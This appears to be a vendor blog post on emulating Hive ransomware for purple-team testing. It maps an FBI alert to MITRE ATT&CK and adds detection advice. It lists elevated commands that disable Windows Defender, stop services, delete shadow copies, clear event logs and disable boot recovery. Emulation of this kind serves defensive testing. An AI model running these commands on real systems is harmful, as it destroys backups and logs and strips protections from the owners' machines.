The FBI released a Flash Alert on August 25, 2021 warning organizations about the Hive ransomware that has affected at least 28 organizations including Memorial Health. This ransomware is new, first observed in June 2021, but operates like most ransomware we track: disabling endpoint security solutions and services, deleting backups and event logs, exfiltrating and encrypting data, and extorting the target into paying a ransom before getting access back to their systems.

As usual for #ThreatThursday, we will consume the Cyber Threat Intelligence and map it to MITRE ATT&CK, we create and share an adversary emulation plan on the SCYTHE GitHub, and discuss ways to prevent, detect, and respond to this threat. 

Cyber Threat Intelligence

We first heard of the Hive Ransomware when Memorial Health released a statement about the attack. Unfortunately the information provided did not include actionable intelligence to emulate the new threat. OnAugust 25, 2021, the FBI released a Flash Alert with more details but without MITRE ATT&CK mapping:

Hive ransomware, which was first observed in June 2021 and likely operates as an affiliate-based ransomware, employs a wide variety of tactics, techniques, and procedures (TTPs), creating significant challenges for defense and mitigation. Hive ransomware uses multiple mechanisms to compromise business networks, including phishing emails with malicious attachments to gain access and Remote Desktop Protocol (RDP) to move laterally once on the network.

After compromising a victim network, Hive ransomware actors exfiltrate data and encrypt files on the network. The actors leave a ransom note in each affected directory within a victim’s system, which provides instructions on how to purchase the decryption software. The ransom note also threatens to leak exfiltrated victim data on the Tor site, “HiveLeaks.”

Following our Purple Team Exercise Framework, the next step is to extract the tactics, techniques, and procedures from the Cyber Threat Intelligence and analyze & organize them. As usual, we provide a MITRE ATT&CK Navigator layer for Hive matched to the TTPs.

Adversary Emulation Plan

The FBI alert provided some procedures which are always welcome from Cyber Threat Intelligence providers. We packed the plan up and shared it in our Community Threats GitHub. We added a note as this threat is destructive: 

Note this threat, if executed with administrative privileges, will disable services, delete Volume Shadow Copies, delete Windows Event Logs, and modify bootup. For testing purposes, you may want to test in non-production, make an offline backup, and/or or take a snapshot.

To execute with SCYTHE:

1. Download and import the threat in JSON format to your SCYTHE instance
2. Download the Virtual File System (VFS) files under the VFS folder
3. Upload the VFS files to your SCYTHE VFS in the following location: VFS:/shared/Hive
4. Create a new campaign, selecting HTTPS, and configure your HTTPS communication options.
5. Import from Existing Threat: Hive
6. Launch Campaign
7. Download the EXE and rename it to Winlo_dump_64_SCY.exe
   

To execute this attack chain manually, you can open an elevated command line interface and run:

• powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
• sc stop LanmanWorkstation
• sc stop SamSs
• sc stop SDRSVC
• sc stop SstpSVc
• sc stop UI0Detect
• sc stop Vmicvss
• sc stop Vmss
• sc stop VSS
• sc stop Wbengine
• sc stop Unistoresvc
• wmic.exe SHADOWCOPY /nointeractive
• wmic.exe shadowcopy delete
• wevtutil.exe cl system
• wevtutil.exe cl security
• wevtutil.exe cl application
• bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
• bcdedit.exe /set {default} recoveryenabled norun
  

Of course the manual method will be manual and not include a number of the TTPs that would make this more realistic. If you do use SCYTHE, you will see the client have data exfiltrated and encrypted, a hive key file, and the ransom note open on your desktop:

Detect & Respond

Like most ransomware, you will want to be able to detect and respond to the attack on the “left of boom” where boom is exfiltration and encryption. Most ransomware is very noisy. Here are some items to consider detecting to respond to Hive ransomware before boom:

• Detecting Command and Control is an area where most Endpoint Detection and Response solutions lack. Consider some of the Network Detection and Response solutions for this use case which is prevalent in most attacks.
• Detect attempts of escalation of privilege - Hive requires administrative privileges to stop services, clear logs, and modify the bootup process.
• Train your team to respond to alerts quickly as a way to limit impact.
• For preventive controls, check out the recommendation from the FBI Alert.

Conclusion

You can use SCYTHE to emulate the Hive Ransomware recently alerted by the FBI to attack, detect, and respond to adversary behaviors. As ransomware evolves, the indicators of compromise will change leaving you in a reactive vs. a proactive stance. In this post, we took the FBI alert, extracted the tactics, techniques, and procedures (TTPs), and mapped them to MITRE ATT&CK. We then created and shared the Hive ransomware emulation plan you can easily import into SCYTHE to test your people, process, and technology. If you are not a SCYTHE customer or would like help running an adversary emulation, let us know.

This Threat Thursday post discusses active research by SCYTHE and other cited third parties into an ongoing threat. The information in this post should be considered preliminary and may be updated as research continues. This information is provided “as-is” without any warranty or condition of any kind, either express or implied.